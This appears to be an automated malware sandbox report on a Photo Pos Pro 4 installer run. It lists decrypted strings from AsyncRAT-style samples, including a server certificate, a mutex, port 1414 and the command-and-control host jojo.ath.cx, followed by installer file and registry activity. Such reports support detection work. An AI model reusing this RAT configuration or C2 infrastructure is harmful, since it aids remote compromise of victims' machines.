                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhY+g1tekZ8/F29gsEIDgf/8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMw/Vwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51/SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXL/hXoE/wCzwzvU/CrzPXd3uMsLfFMDHZJ+OQ9OXKU/CHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3/ingNFaTyYmGsmLIE2Jq5AR1A+xA+FEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICt+J8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4/RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8+hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd/62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNt/CjnlaMc40DJ+HlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6/xZCPjr22V/xZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWT/nKuRvIEYU4Ra+B39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7/kVfIYuRxl+YefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWN/Fm+lzF3THeHU6vNJ+5UoAWHYFW8wfJCbzQ/0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckUL/lEf4Y92uJVKvLGruQt/mtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv+36kLKhgIJlqC7Xx/PVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV/3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWS/JykARBv9o2BjL/PTADfwAtc1b4nWo0l+CI8IjjYXu/mJOuwR+kFJ19INtwbffQvT9U12t4smpcZV+OK0opk4Yr9r1tZYm92ghXA==
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: Y3ofjTzISfcoxOr7+/s80jpDH3U30nmAAzBABwFztp8FPSSukGrVCIfYqQ+g0p3fViNI/cmTtvQbZ0acrZPdv3two5wUjJ/jpE7ii9aqqXSFRQg7mMdJ/LKFWC078K4LTER1kBekNl2eKzhlMoW25J5zydFamRZQXNlIE6gBWYN6zNuqhwoPTX9BvTxx9C6mxvyn1w1FbzOre0yG8FaJ4kORA+8Sb8QT83I8BeOL6Qjz8FEntj1Lv0iQOK9lGG0NikWQLIlMziJYUMicR4X6LtX+p4rLDxTo5xUN10PIWYbA33tidHCDTnTjgBaqOJjh0NFdoPPXLnfstzyjbbMIcb+jGf7cuytEvCpMKJN8G2MC6xMTn1LtRdaJexBKmRbzbbzzsaEdHq5UuY5amjlK5Iomgz+VeQ/FvvhvGbfvHDnR8Gak9wA9MQsZUNuO61Q07QY0WDyaDgFjFuKeSVFlz57/ETCgcb7y+xxQtKqBjnwwxt9Bmy/fkzqf8PzzqfzYfzR3Y9ojT9On6B7JHOZUpL0DqdXTWmSC7VI+h2AR5nueELNBzBgiOHJwKKGb63fnt8SJPQTQw7zYBfGz0OixmiI8l1tciCUXxvDEPf4T0iQ+VsvCxz6EL61ps5Q5SK9rAsN1Cp0dogpaYgm80bydgzBWlAzNjf2XRreFfMh33q8=
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: true
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: null
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: Domain
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: 1414
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: jojo.ath.cx
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: | Edit 3LOSH RAT
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: false
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: AsyncMutex_7SI8OkPne
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhY+g1tekZ8/F29gsEIDgf/8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMw/Vwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51/SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXL/hXoE/wCzwzvU/CrzPXd3uMsLfFMDHZJ+OQ9OXKU/CHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3/ingNFaTyYmGsmLIE2Jq5AR1A+xA+FEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICt+J8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4/RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8+hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd/62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNt/CjnlaMc40DJ+HlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6/xZCPjr22V/xZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWT/nKuRvIEYU4Ra+B39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7/kVfIYuRxl+YefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWN/Fm+lzF3THeHU6vNJ+5UoAWHYFW8wfJCbzQ/0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckUL/lEf4Y92uJVKvLGruQt/mtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv+36kLKhgIJlqC7Xx/PVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV/3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWS/JykARBv9o2BjL/PTADfwAtc1b4nWo0l+CI8IjjYXu/mJOuwR+kFJ19INtwbffQvT9U12t4smpcZV+OK0opk4Yr9r1tZYm92ghXA==
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: Y3ofjTzISfcoxOr7+/s80jpDH3U30nmAAzBABwFztp8FPSSukGrVCIfYqQ+g0p3fViNI/cmTtvQbZ0acrZPdv3two5wUjJ/jpE7ii9aqqXSFRQg7mMdJ/LKFWC078K4LTER1kBekNl2eKzhlMoW25J5zydFamRZQXNlIE6gBWYN6zNuqhwoPTX9BvTxx9C6mxvyn1w1FbzOre0yG8FaJ4kORA+8Sb8QT83I8BeOL6Qjz8FEntj1Lv0iQOK9lGG0NikWQLIlMziJYUMicR4X6LtX+p4rLDxTo5xUN10PIWYbA33tidHCDTnTjgBaqOJjh0NFdoPPXLnfstzyjbbMIcb+jGf7cuytEvCpMKJN8G2MC6xMTn1LtRdaJexBKmRbzbbzzsaEdHq5UuY5amjlK5Iomgz+VeQ/FvvhvGbfvHDnR8Gak9wA9MQsZUNuO61Q07QY0WDyaDgFjFuKeSVFlz57/ETCgcb7y+xxQtKqBjnwwxt9Bmy/fkzqf8PzzqfzYfzR3Y9ojT9On6B7JHOZUpL0DqdXTWmSC7VI+h2AR5nueELNBzBgiOHJwKKGb63fnt8SJPQTQw7zYBfGz0OixmiI8l1tciCUXxvDEPf4T0iQ+VsvCxz6EL61ps5Q5SK9rAsN1Cp0dogpaYgm80bydgzBWlAzNjf2XRreFfMh33q8=
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: false
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: true
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: null
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: false
                  Source: 40.2.smcdll.exe.2c73d54.0.raw.unpackString decryptor: Domain
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: Base64 decoded: [null,null,null,null,null,null,[1740326329,862000000],null,null,null,[null,[7,9],null,2,null,"en"],"https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspx",null,[[8,"sftWY_e4dpo"],[9,"en-US"],[23,"1740326326"],[19,"2"]...
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxHTTP Parser: No favicon
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Photo Pos Pro 4.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Photo Pos Pro 4.exe
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator\5456531.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Common Files\Thraex Software\AutoUpdator\AutoUpdator.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456562.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\FileDlgExtenders.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456578.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\iecore.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456828.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ielib64.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456875.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\IEvolution2.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456906.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.Compatibility.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456921.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456937.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Microsoft.VisualBasic.PowerPacks.Vs.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5456953.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457203.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe.config
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457218.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457296.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Photo Pos Pro.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457312.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosMessageLib.NET.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PosNetIpLib.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exe
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.exe.config
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457343.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PPPNET471service.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457359.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PXBIPctl.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457359.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\PXBIPctl.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457375.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ShellBrowser.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457406.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\ShellBrowser.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457437.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457468.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\SkinSoft.VisualStyler.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457484.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457546.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457593.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.RadDock.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457609.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Black.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457625.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.Office2010Silver.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457656.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.Themes.VisualStudio2012Dark.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457687.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457796.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.UI.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457859.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\Telerik.WinControls.xml
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\5457890.tmp
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeDirectory created: C:\Program Files\Photo Pos Pro 4\TelerikCommon.dll
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Pos Pro 4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PhotoPosPro_PreInstaller.exe.log
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeFile created: C:\Program Files\Photo Pos Pro 4\Software License Agreement.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1028\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1029\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1031\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1036\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1040\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1041\license.rtf
